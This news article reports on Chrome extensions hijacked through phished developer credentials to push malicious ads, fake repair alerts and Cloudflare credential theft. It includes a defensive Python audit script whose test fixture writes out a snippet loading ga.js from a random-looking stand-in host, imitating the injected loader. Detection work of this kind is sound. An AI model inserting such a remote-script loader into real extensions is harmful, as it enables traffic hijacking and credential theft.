The number of compromised Chrome browser extensions is growing beyond the initial Aug. 1 hijacking of the OCR add-on called Copyfish. Added to the list are seven additional legitimate Chrome Extensions that attackers took over and used to manipulate internet traffic and web-based ads, according to researchers at Proofpoint.
A report released Monday expands the list of compromised Chrome Extensions to include Web Developer (0.4.9), Chrometana (1.1.3), Infinity New Tab (3.12.3), Web Paint (1.2.1), and Social Fixer (20.1.1). Proofpoint also believes the TouchVPN and Betternet VPN extensions were compromised in the same way at the end of June.
The rash of browser extension takeovers is similar to a July 28 compromise of developer credentials belonging to distributor A9t9 Software. In that incident the popular free optical character recognition extension for web browsers called Copyfish was hijacked by attackers who used it to send spam.
“At the end of July and beginning of August, several Chrome Extensions were compromised after their author’s Google Account credentials were stolen via a phishing scheme,” Proofpoint said. Researchers did not identify the developer or developers that may have been involved.
The July attack against A9t9 Software stemmed from a phishing email targeting a developer behind the Copyfish extension. The recipient thought the email was from Google, warning that they needed to update the Copyfish app or face it being booted from the Google Play marketplace.
Next, an unsuspecting A9t9 Software “team member” clicked on a link and up popped a “Google” password dialog box. “The unlucky team member entered the password for our developer account,” according to a statement by the company A9t9 Software earlier this month.
This allowed attackers to customize the Copyfish extension via code injection and distribute malicious versions of the software. Since A9t9 Software reported the hijacking, it said it has worked with Google to win back control of the developer account and remove malicious elements of the Copyfish Chrome Extension.
In similar phishing attacks, Proofpoint said hackers tricked extension coders to hand over Google Account credentials. Those credentials were then used to access Google developer accounts tied to specific Chrome extensions. As with Copyfish, extensions were modified with malicious code and Google developer accounts compromised.
“This resulted in hijacking of traffic and exposing users to potentially malicious popups and credential theft,” wrote Proofpoint on Monday.
In one example of malicious behavior, the compromised version of an extension attempts to substitute ads on the victim’s browser, hijack traffic from legitimate advertising networks and trick victims into “repairing” their computer. Proofpoint said that attackers singled out adult websites when substituting ads and focused on a particular unnamed ad network.
“In many cases, victims were presented with fake JavaScript alerts prompting them to ‘repair’ their PC then redirecting them to affiliate programs from which the threat actors could profit,” Proofpoint said. “(The) malvertising chain that brings users from the fake alert to an affiliate site; we observed the compromised extension directing victims to two such affiliates, although others may also have been used.”
An analysis of the affiliate landing pages (browser-update[.]info and searchtab[.]win) showed that traffic was “substantial.” According to Proofpoint, searchtab[.]win received 920,000 visits in one month. It’s unclear how much of that traffic was generated via the hijacked Chrome Extensions.
Researchers said that they were alerted to the additional extension takeovers by developer Chris Pederick, who tweeted on Aug. 12 that the Web Developer extension for Chrome had been compromised and that a hacked version of the extension (0.4.9) had been uploaded and was being distributed.
In Pederick’s case, Proofpoint was able to retrieve the compromised version of the extension and isolate the injected code. An analysis of the code showed that attackers were retrieving a remote file, ga.js, over HTTPS from a server whose domain is generated via a domain generation algorithm, Proofpoint said.
“The code from this first step allows the threat actors to conditionally call additional scripts including some to harvest Cloudflare credentials,” they wrote. Credentials were used to bypass Cloudflare protections, enabling hackers to substitute advertisements on websites, Proofpoint said.
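The injected code Proofpoint describes boils down to a content script that pulls a second-stage script (ga.js) from a remote, algorithmically generated host. The following audit script is an added example, not Proofpoint's or any extension author's code: it reads an unpacked extension's manifest.json, scans the declared scripts for remote script-source or fetch/XHR targets, and flags hosts outside an allowlist, marking those that look machine-generated. The allowlist, the sample hostnames and the vowel-ratio DGA heuristic are assumptions for illustration.

```python
import json
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Matches `.src = "https://..."`, `fetch("https://...")` and `xhr.open("GET", "https://...")`.
REMOTE_LOAD_RE = re.compile(
    r"""(?:\.src\s*=\s*|fetch\(\s*|\.open\(\s*['"](?:GET|POST)['"]\s*,\s*)['"](https?://[^'"]+)['"]""", re.I)

def extract_remote_urls(js_source):
    """Return every absolute http(s) URL used as a script source or request target."""
    return REMOTE_LOAD_RE.findall(js_source)

def looks_generated(host):
    """Crude DGA heuristic (an assumption, not Proofpoint's): long registrable label with few vowels."""
    label = host.split(".")[-2] if "." in host else host
    vowels = sum(ch in "aeiou" for ch in label)
    return len(label) >= 10 and vowels / len(label) < 0.25

def declared_scripts(manifest):
    """Script paths named in manifest.json: MV2 background scripts, MV3 service worker, content scripts."""
    bg = manifest.get("background", {})
    paths = list(bg.get("scripts", [])) + ([bg["service_worker"]] if "service_worker" in bg else [])
    for cs in manifest.get("content_scripts", []):
        paths.extend(cs.get("js", []))
    return paths

def audit_extension(ext_dir, allowlist):
    """List each remote load whose host is outside the allowlist, flagging DGA-looking hosts."""
    manifest = json.loads((ext_dir / "manifest.json").read_text())
    findings = []
    for rel in declared_scripts(manifest):
        for url in extract_remote_urls((ext_dir / rel).read_text()):
            host = urlparse(url).hostname or ""
            if host not in allowlist:
                findings.append({"file": rel, "url": url, "dga_like": looks_generated(host)})
    return findings

def demo():
    """Audit a constructed fixture whose content script mimics the injected remote loader."""
    root = Path(tempfile.mkdtemp())
    (root / "manifest.json").write_text(json.dumps({"manifest_version": 2, "name": "sample",
        "version": "0.0.1", "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}]}))
    (root / "content.js").write_text(
        "var s = document.createElement('script');\n"
        "s.src = 'https://xk4q9zbv2wlmfr.com/ga.js';\n"      # constructed DGA-style host
        "document.head.appendChild(s);\n"
        "fetch('https://api.example-vendor.com/v1/ping');\n")  # constructed, allowlisted vendor host
    return audit_extension(root, allowlist={"api.example-vendor.com"})
```

Running `demo()` reports only the ga.js loader, since the vendor host is allowlisted; against a real unpacked extension, point `audit_extension` at its directory and populate the allowlist with the hosts the extension legitimately contacts.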
“In addition to hijacking traffic and driving users to questionable affiliate programs, we have also observed them gathering and exfiltrating Cloudflare credentials, providing the actors with new means of potential future attacks,” researchers said.